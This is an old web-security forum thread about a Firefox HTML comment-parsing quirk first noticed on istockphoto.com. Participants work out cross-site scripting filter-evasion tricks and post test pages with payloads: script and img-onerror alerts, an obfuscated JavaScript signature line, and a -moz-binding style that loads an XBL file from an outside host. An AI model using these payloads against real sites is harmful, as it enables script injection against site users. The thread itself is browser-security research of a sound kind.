I was looking at some poorly sanitized vars at istockphoto.com and I came across some weird FF commenting behavior, anyone got any insight/confirmation?

Look at this URL: h++p://www.istockphoto.com/user_view.php?id=1--

for some reason entering [number]-- as the id completely wrecks FF's rendering of the page (FF 2.0.0.4 XP). There doesn't seem to be any reason for this though :\
Viewing source shows a huge chuck of the source commented out until a seemingly arbitrary point. Viewing generated source shows everything as normal.
And it doesn't seem to happen in IE6, confirm?

EDIT: Behavior is reproduced if -- is anywhere in the query string. ie: [www.istockphoto.com] , [www.istockphoto.com]

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 06/08/2007 07:21PM by tx.

Weird!

<!--
iweb5.istockphoto.com / RadwareDB (idb6) was pleased to serve you today.
Current url: www.istockphoto.com/file_search.php?action=file--&clearanceBin=
-->

Looks pretty much like a regex bug in FFox - did you already report it?

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

weird indeed.

so you can insert text between the -- and the > when closing a comment...

firefox also seems to try to intelligently handle nested comments, though only to depth of one, e.g. a comment inside a comment. furthermore, the nested comment can begin without the <! , only the -- is needed. if i understand correctly, this is what is happening on the istockphoto.com page. it boils down to:

<!--
x--y
-->
z--w>

so line one starts the outside comment, line two starts the nested comment with the --, line three ends the nested comment (rather than the outside comment like i would expect), and line 4 ends the outside comment.

apparently you can also insert text between the <! and the -- at the beginning of a comment, however this messes up the nesting, so doing this in line one of the above example would cause the second line to not be treated as the opening of a nested comment.

note that you need a doctype for this to work properly. when i tried to reproduce this bug without one, i wasn't getting anything. with "HTML 4.01 Transitional" and "XHTML 1.1" it reproduced just fine.

i'm probably wrong but it seems this could be used to escape from a double quoted attribute that filters for double quotes. sort of like a multibyte injection, but the opening double quote is getting tampered with rather then the closing. for example, say a page had two injection points (three actually), the first injection being inserted into a comment at the top of the page which filters "<>, the second inject being inserted to an attribute of any field that is wrapped in double quotes which only filters ". so into the first you inject -- and into the second you inject --><div name= . if your third injection point is now following the next double quote, you might be able to actually do something there.

granted that's a lot of conditions that all have to be met, but theoretically it seems like it could work.

That is one cool browser bug, wow nice stuff.

Really interesting find!

[www.the-mice.co.uk] Switch/Twitch
[code.google.com] .NETIDS

I did a little bit more playing around with it and turns out you only need 2 injection points - one in a comment and one in a double quote:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
<body>
<!-- This is the first injection point: -- -->
<a href="This is the second injection point: --evadefilter><b style=-moz-binding:url('http://www.md5-db.com/STXSS_XBL.xml#loader') /> <a href=test >link</a>
</body>
</html>

[www.the-mice.co.uk] Switch/Twitch
[code.google.com] .NETIDS

aah, good thinking Martin... eliminating the third injection point makes it much more useful. unfortunately, i don't see a way of doing it with a single injection that gets reflected to both a comment and to a subsequent attribute field. the close tag must have the > at the end but opening -- cannot have a > anywhere after it or it throws off the nesting.

Interesting thinking, that one can get complex, still it might be done with a mixture of reflected & stored XSS. Would be cool to see this on the XSS sheet, I know it's exotic, but who knows, could come in useful.

Wow there's a lot of response on this, excellent.

@thornmaker: It seems to me that opening any query that opens with --some-text> (or something similar) will work to break out of a quoted attribute if the variable is echoed both in the comment and then later in the attribute. I put up a little test page, [tx.lowtechlive.com]

Basically, entering --end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=%23 as the value for $_GET['url'] causes the following html output (edited slightly to avoid linkification):


<!-- First the uri is echoed out, url encoded: url: h+tp://tx.lowtechlive.com/comment.php?url=--end-comment%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Ca%20href=%23 -->
Then the value of the _GET['url'] variable is echoed, replacing any double quotes with the html entity: <a href="--end-comment><script>alert(String.fromCharCode(88,83,83));</script><a href=#">Here is the link</a>


And the alert successfully fires.

EDIT: Note that everything between <!-- and --end-comment> is commented out.

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 06/13/2007 04:00PM by tx.

@tx: nice! so it can be done with a single injection reflected twice.

however, that will only work if, as in the demo page you provide, the > character is url encoded when reflected in the comment, and not url encoded when reflected in the attribute. I'm still looking for a way to make it work when the reflected text is the exact same in both instances. wouldn't this be a more likely situation?

The thing is, imho, if < or > aren't filtered out the first time, then the comment could just be ended with --> , which kind of makes it a moot point.

Example (this page doesn't url encode the variable): h+tp://tx.lowtechlive.com/comment_no_enc.php?url=--%3E%20%3Cimg%20src=333%20onerror=alert(1)%3E%20%3C!--%20--


That uses this query:
--> <img src=333 onerror=alert(1)> <!-- --

It successfully alerts twice and breaks out of the quoted attribute, but it's really just a fancy way of going --><script>whatever();</script>

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 06/13/2007 08:46PM by tx.

I agree with you. if the > isn't filtered from the commented portion, then you can just do your injection there like your page demonstrates. what i was trying to get at earlier was to have the injection reflected twice, with the exact same text reflected, but where the -- was being interpreted as a comment still so that everything is commented out until the where the injection is reflected the second time... basically the -- needs to be used as an open tag in one place and as part of a close tag in the next. i would like to try some fuzzing on this before I decide its not possible, but from what i've tested so far, no dice. probably, the best we are going to get is martin's variation with two injections, or your variation with just one. still, very cool.



Edited 1 time(s). Last edit at 06/13/2007 09:12PM by thornmaker.

thornmaker - it is doable:

2 injection points
IJ1 is inside a comment and encodes < and >
IJ2 is doublequotes attribute that doesn't encode < and >

Injection: test --> <script>alert(1)</script>

At IJ1 this will look like: test --&gt; &lt;script&gt;alert(1)&lt;script&gt;
Whilst at IJ2 it will be: test --> <script>alert(1)</script>

An example of a final page rendering using this:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
<body>
<!--
INJECTION #1: test --&gt; &lt;script&gt;alert(1)&lt;script&gt;
-->

INJECTION #2: <a href="test --> <script>alert(1)</script>">This is a link</a>
</body>
</html>

[www.the-mice.co.uk] Switch/Twitch
[code.google.com] .NETIDS

Ok, in addition to the previous post I think I worked out some more how Firefox is handling comments. Apologies if you already knew this - I didn't!

The symbol Firefox uses for start of comment is not "<!--" it is purely "<!" and the close tag for comments is ">"

Therefore:

<! this is a comment >

is rendered as a valid Firefox comment.

However, there are some strange things going on!

Here's another test page:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
test
</title>
<body>

[Comment 1]
<! comment #1 >
<br/>
[End of Comment 1]

<br/>
[Comment 2]
<!--
Comment #2
-->
<br/>
[End of Comment 2]

<br/>
[Comment 3]
<!
Comment #3
--
Comment #3 Part 2
>
<br/>
[End of Comment 3]

<br/>
[Comment 4]
<!
Comment #4
--
Comment #4 Part 2
-->
<br/>
[End of Comment 4]

<br/>
[Comment 5]
<!--
Comment #5
--
Comment #5 Part 2 (Nested)
-->
Comment #5 Part 3
-->
<br/>
[End of Comment 5]

<br/>
[Comment 6]
<!--
Comment #6
--
Comment #6 Part 2 (Nested)
--
Comment #6 Part 3
--
Comment #6 Part 4
--
Comment #6 Part 5
-->
<br/>
[End of Comment 6]

<br/>
[Comment 7]
<!--
Comment #7
--
>
-->
<br/>
[End of Comment 7]

</body>
</html>

I'm still trying to work out some rules for how this all works!

[www.the-mice.co.uk] Switch/Twitch
[code.google.com] .NETIDS

so you could use a <!--, a <!, or a -- placed somewhere before an injectable attribute to break out of the attribute... and each might be useful in situations where the others are not depending on what's filtered and other content content on the page.

Just a note: this is bug 233270 and actually not a bug.